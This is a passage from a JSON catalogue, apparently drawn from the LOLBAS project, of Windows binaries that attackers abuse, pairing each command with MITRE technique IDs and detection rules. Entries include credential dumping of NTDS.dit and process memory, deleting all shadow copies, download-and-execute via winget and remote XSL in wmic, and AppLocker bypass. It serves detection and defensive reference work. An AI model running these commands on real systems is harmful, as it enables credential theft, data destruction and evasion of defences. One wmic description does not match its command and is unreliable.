for executed command"}],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"]},{"id":"lolbas:tttracer-exe:1","toolId":"lolbas:tttracer-exe","toolName":"Tttracer.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"TTTracer.exe -dumpFull -attach {PID}","description":"Dumps process using tttracer.exe. Requires administrator privileges","usecase":"Dump process by PID","mitre":["T1003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Parent child relationship. Tttracer parent for executed command"}],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"]},{"id":"lolbas:unregmp2-exe:0","toolId":"lolbas:unregmp2-exe","toolName":"Unregmp2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rmdir %temp%\\lolbin /s /q 2>nul & mkdir \"%temp%\\lolbin\\Windows Media Player\" & copy C:\\Windows\\System32\\calc.exe \"%temp%\\lolbin\\Windows Media Player\\wmpnscfg.exe\" >nul && cmd /V /C \"set \"ProgramW6432=%temp%\\lolbin\" && unregmp2.exe /HideWMP\"","description":"Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\\wmpnscfg.exe'.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml"},{"type":"IOC","value":"Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`"}],"references":["https://twitter.com/notwhickey/status/1466588365336293385","https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"]},{"id":"lolbas:vbc-exe:0","toolId":"lolbas:vbc-exe","toolName":"vbc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"vbc.exe /target:exe {PATH_ABSOLUTE:.vb}","description":"Binary file used by .NET to compile Visual Basic code to an executable.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"]},{"id":"lolbas:vbc-exe:1","toolId":"lolbas:vbc-exe","toolName":"vbc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}","description":"Binary file used by .NET to compile Visual Basic code to an executable.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"]},{"id":"lolbas:verclsid-exe:0","toolId":"lolbas:verclsid-exe","toolName":"Verclsid.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"verclsid.exe /S /C {CLSID}","description":"Used to verify a COM object before it is instantiated by Windows Explorer","usecase":"Run a COM object created in registry to evade defensive counter measures","mitre":["T1218.012"],"privilege":"user","fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml"}],"references":["https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"]},{"id":"lolbas:vssadmin-exe:0","toolId":"lolbas:vssadmin-exe","toolName":"Vssadmin.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"vssadmin delete shadows /all /quiet","description":"Delete all volume shadow copies on the host without prompting","usecase":"Destroy shadow copies to prevent file and system recovery, a technique commonly used by ransomware","mitre":["T1490"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"}],"references":["https://attack.mitre.org/techniques/T1490/","https://github.com/Neo23x0/Raccine","https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"]},{"id":"lolbas:wab-exe:0","toolId":"lolbas:wab-exe","toolName":"Wab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wab.exe","description":"Change HKLM\\Software\\Microsoft\\WAB\\DLLPath and execute DLL of choice","usecase":"Execute dll file. Bypass defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"},{"type":"IOC","value":"WAB.exe should normally never be used"}],"references":["https://twitter.com/Hexacorn/status/991447379864932352","http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Wab/"]},{"id":"lolbas:wbadmin-exe:0","toolId":"lolbas:wbadmin-exe","toolName":"wbadmin.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -quiet","description":"Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)","usecase":"Snapshoting of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml"},{"type":"IOC","value":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"]},{"id":"lolbas:wbadmin-exe:1","toolId":"lolbas:wbadmin-exe","toolName":"wbadmin.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -notRestoreAcl -quiet","description":"Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.","usecase":"Dumping of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml"},{"type":"IOC","value":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"]},{"id":"lolbas:wbemtest-exe:0","toolId":"lolbas:wbemtest-exe","toolName":"wbemtest.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wbemtest.exe","description":"Execute arbitary commands through WMI through a GUI managment interface for Web Based Enterprise Management testing (WBEM). Uses WMI to Create and instance of a Win32_Process WMI class with a commandline argument of the target command to spawn. Spawns a GUI so it requires interactive access. For a demo, see link to blog in resources.","usecase":"Execute arbitrary commands through WMI classes","mitre":["T1047"],"privilege":"user","fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"wbemtest.exe binary spawned"}],"references":["https://saulpanders.github.io/2025/01/20/lolbas-wbemtest.html","https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"]},{"id":"lolbas:winget-exe:0","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winget.exe install --manifest {PATH:.yml}","description":"Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`","usecase":"Download and execute an arbitrary file from the internet","mitre":["T1105"],"privilege":"admin","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"]},{"id":"lolbas:winget-exe:1","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"winget.exe install --accept-package-agreements -s msstore {name or ID}","description":"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use \"Sysinternals Suite\" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.","usecase":"Download and install software from Microsoft Store, even if Microsoft Store App is blocked","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"]},{"id":"lolbas:winget-exe:2","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"winget.exe install --accept-package-agreements -s msstore {name or ID}","description":"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine, and even if AppLocker is active on the machine. For example, use \"Sysinternals Suite\" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.","usecase":"Download and install software from Microsoft Store, even if Microsoft Store App is blocked, and AppLocker is activated on the machine","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"]},{"id":"lolbas:wlrmdr-exe:0","toolId":"lolbas:wlrmdr-exe","toolName":"Wlrmdr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}","description":"Execute executable with wlrmdr.exe as parent process","usecase":"Use wlrmdr as a proxy binary to evade defensive countermeasures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml"},{"type":"IOC","value":"wlrmdr.exe spawning any new processes"}],"references":["https://twitter.com/0gtweet/status/1493963591745220608","https://twitter.com/Oddvarmoe/status/927437787242090496","https://twitter.com/falsneg/status/1461625526640992260","https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw","https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"]},{"id":"lolbas:wmic-exe:0","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"wmic.exe process call create \"{PATH_ABSOLUTE}:program.exe\"","description":"Execute a .EXE file stored as an Alternate Data Stream (ADS)","usecase":"Execute binary file hidden in Alternate data streams to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:1","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process call create \"{CMD}\"","description":"Execute calc from wmic","usecase":"Execute binary from wmic to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:2","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe /node:\"192.168.0.1\" process call create \"{CMD}\"","description":"Execute evil.exe on the remote system.","usecase":"Execute binary on a remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:3","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process get brief /format:\"{REMOTEURL:.xsl}\"","description":"Create a volume shadow copy of NTDS.dit that can be copied.","usecase":"Execute binary on remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/en